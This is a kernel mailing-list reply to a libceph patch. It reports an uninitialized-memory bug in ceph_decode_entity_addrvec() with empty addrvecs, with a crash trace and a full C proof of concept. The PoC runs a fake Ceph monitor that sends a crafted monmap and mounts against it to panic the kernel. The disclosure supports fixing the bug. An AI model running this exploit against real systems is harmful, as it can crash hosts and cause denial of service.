Re: [PATCH v3] libceph: tolerate addrvecs with multiple entries of the same type

From: XIAO WU

Date: Sat Jun 20 2026 - 21:29:54 EST


Hi Kefu,

I came across a Sashiko AI code review [1] that flagged a pre-existing
uninitialized memory issue in `ceph_decode_entity_addrvec()`.  When the
addrvec has zero entries (`addr_cnt == 0`), the function returns 0
without writing to `*addr`, but callers like `ceph_monmap_decode()`
pass addresses from `kmalloc_flex()` and proceed to use them.

I was able to reproduce this in QEMU by running a fake Ceph monitor that
sends a monmap with an empty addrvec.  With `panic_on_warn=1`, the
kernel hits a WARNING in `ceph_con_v1_try_read()` and panics.

On Thu, Jun 11, 2026 at 07:32:51PM +0800, Kefu Chai wrote:
> ceph_decode_entity_addrvec() currently rejects any addrvec containing
> more than one entry that matches the requested msgr type...

Your patch correctly tolerates duplicate entries, but the function still
returns success without touching `*addr` when `addr_cnt == 0`:

```c
// net/ceph/decode.c: ceph_decode_entity_addrvec()
if (!addr_cnt)
    return 0;  // *addr is still uninitialized
if (addr_cnt == 1 && !memchr_inv(&tmp_addr, 0, sizeof(tmp_addr)))
    return 0;  // same
```

Callers that pass addresses from dynamic allocation hit stale data:

```c
// net/ceph/mon_client.c: ceph_monmap_decode()
mon_inst = kmalloc_flex(..., num_mon, sizeof(*mon_inst));
// ...
ceph_decode_entity_addrvec(p, end, msgr2, &mon_inst[i].addr);
// mon_inst[i].addr may be uninitialized if addrvec was empty
```

[Reproduction]

I set up a fake Ceph v1 monitor on localhost that sends a monmap
containing a monitor entry with an empty addrvec (addr_cnt=0). Mounting
the Ceph filesystem against it triggers the monmap decode path, causing
the client to attempt a connection with the uninitialized address.

[Crash — kernel 7.1.0-rc6, panic_on_warn=1]

  con->v1.connect_seq != le32_to_cpu(con->v1.in_reply.connect_seq)
  WARNING: net/ceph/messenger_v1.c:901 at ceph_con_v1_try_read+0x59f7/0x7020

  RIP: 0010:ceph_con_v1_try_read+0x59f7/0x7020
  Call Trace:
   <TASK>
   ceph_con_workfn+0xa04/0x13c0
   process_one_work+0xa20/0x1c50
   worker_thread+0x6df/0xf30
   kthread+0x387/0x4a0
   ret_from_fork+0xb2c/0xdd0
   </TASK>

  Kernel panic - not syncing: kernel: panic_on_warn set ...

Full PoC source (poc.c):
---8<----------------------------------------------------------------
/*
 * PoC: Uninitialized memory in ceph_decode_entity_addrvec()
 * Compile: gcc -static -o poc poc.c
 * Run: ./poc [port]
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mount.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/poll.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <errno.h>
#include <fcntl.h>

#define BANNER "ceph v027"
#define BNR 9
#define ADR 136
#define CBNR (BNR+ADR)
#define SBNR (BNR+2*ADR)

#define TAG_RDY 1
#define TAG_MSG 7
#define MON_MAP 4
#define ENT_MON 1

#define MSZ 16384

typedef uint8_t u8; typedef uint16_t u16;
typedef uint32_t u32; typedef uint64_t u64;

static u32 ct[256];
static int ci;

static void ic(void)
{
    u32 i, j, k;
    if (ci) return;
    for (i = 0; i < 256; i++) {
        k = i;
        for (j = 0; j < 8; j++)
            k = (k >> 1) ^ (k & 1 ? 0x82F63B78 : 0);
        ct[i] = k;
    }
    ci = 1;
}

static u32 crc(u32 c, const u8 *b, int l)
{
    while (l--) c = ct[(c ^ *b++) & 0xFF] ^ (c >> 8);
    return c;
}

#define W8(b,v)  ((b)[0] = (u8)(v))
#define W16(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255)
#define W32(b,v) ((b)[0]=(v)&255,(b)[1]=((v)>>8)&255,(b)[2]=((v)>>16)&255,(b)[3]=((v)>>24)&255)
#define W64(b,v) do { int _i; for (_i=0; _i<8; _i++) (b)[_i]=((u64)(v)>>(_i*8))&255; } while(0)

#define REQ_FEAT (1ULL << 23)

static int rcv(int f, u8 *b, int l)
{
    while (l > 0) {
        struct pollfd p = { .fd = f, .events = POLLIN };
        if (poll(&p, 1, 15000) <= 0) return -1;
        int n = read(f, b, l);
        if (n <= 0) return -1;
        b += n; l -= n;
    }
    return 0;
}

static int snd(int f, u8 *b, int l)
{
    while (l > 0) { int n = write(f, b, l); if (n <= 0) return -1; b += n; l -= n; }
    return 0;
}

static int ea(u8 *b) { W8(b, 2); W32(b+1, 0); return 5; }

static int pay(u8 *b)
{
    int o = 0, bo, so, po, mo, ms;
    bo = o; W32(b+o, 0); o += 4;
    W8(b+o, 6); o++; W8(b+o, 1); o++;
    so = o; W32(b+o, 0); o += 4;
    po = o;
    W64(b+o, 0x42); o += 8;
    W32(b+o, 1); o += 4;
    W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
    W8(b+o, 1); o++; W8(b+o, 1); o++; W32(b+o, 0); o += 4;
    W32(b+o, 1); o += 4;
    W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
    W8(b+o, 1); o++; W8(b+o, 1); o++;
    mo = o; W32(b+o, 0); o += 4;
    ms = o;
    W32(b+o, 2); o += 4; memcpy(b+o, "m0", 2); o += 2;
    o += ea(b+o);
    W32(b+mo, o - ms);
    W32(b+so, o - po);
    W32(b+bo, o - bo);
    return o;
}

#define HS 60
#define FS 13

static int msg(u8 *b, u64 s)
{
    int o = 0;
    b[o++] = TAG_MSG;
    int h = o;
    memset(b+o, 0, HS); o += HS;
    int pl = pay(b+o); o += pl;
    memset(b+o, 0, FS); o += FS;
    u8 *hh = b + h;
    W64(hh+0, s); W16(hh+16, MON_MAP); W16(hh+18, 127);
    W16(hh+20, 1); W32(hh+22, pl); W64(hh+36, ENT_MON);
    W64(hh+44, 0); W32(hh+56, crc(0, hh, 56));
    return o;
}

static int mon(int pt)
{
    int s, c; struct sockaddr_in a; u8 b[MSZ];
    ic();
    s = socket(AF_INET, SOCK_STREAM, 0);
    int o = 1; setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &o, sizeof(o));
    memset(&a, 0, sizeof(a)); a.sin_family = AF_INET;
    a.sin_addr.s_addr = htonl(INADDR_LOOPBACK); a.sin_port = htons(pt);
    bind(s, (void *)&a, sizeof(a)); listen(s, 1);
    struct pollfd p = { .fd = s, .events = POLLIN };
    if (poll(&p, 1, 60000) <= 0) goto out;
    c = accept(s, 0, 0);

    if (rcv(c, b, CBNR) < 0) goto done;
    { u8 *p = b; memcpy(p, BANNER, BNR); p += BNR;
      memset(p, 0, ADR); p += ADR; memset(p, 0, ADR);
      if (snd(c, b, SBNR) < 0) goto done; }
    { int t = 0; while (t < 26) {
        struct pollfd p2 = { .fd = c, .events = POLLIN };
        if (poll(&p2, 1, 10000) <= 0) goto done;
        int n = read(c, b+t, MSZ-t); if (n <= 0) goto done; t += n; } }
    memset(b, 0, 26); W8(b, TAG_RDY); W64(b+1, REQ_FEAT);
    snd(c, b, 26); usleep(300000);
    { int ml = msg(b, 1); snd(c, b, ml); }
    usleep(500000);
    { int ml = msg(b, 2); snd(c, b, ml); }
out:
    close(c); close(s); return 0;
done:
    close(c); close(s); return -1;
}

int main(int ac, char **av)
{
    int pt = 16789; if (ac >= 2) pt = atoi(av[1]);
    pid_t pid = fork();
    if (pid == 0) { mon(pt); _exit(0); }
    usleep(200000);
    mkdir("/tmp/mnt", 0700);
    char s[64]; snprintf(s, 64, "127.0.0.1:%d:/", pt);
    mount(s, "/tmp/mnt", "ceph", 0, "name=admin");
    waitpid(pid, 0, 0);
    umount2("/tmp/mnt", MNT_FORCE); rmdir("/tmp/mnt");
    return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -static -o poc poc.c

[1] https://sashiko.dev/#/patchset/20260611113251.2975975-1-k.chai%40proxmox.com
    (Sashiko AI code review — "Uninitialized Memory", Severity: High)

Thanks,
XIAOWU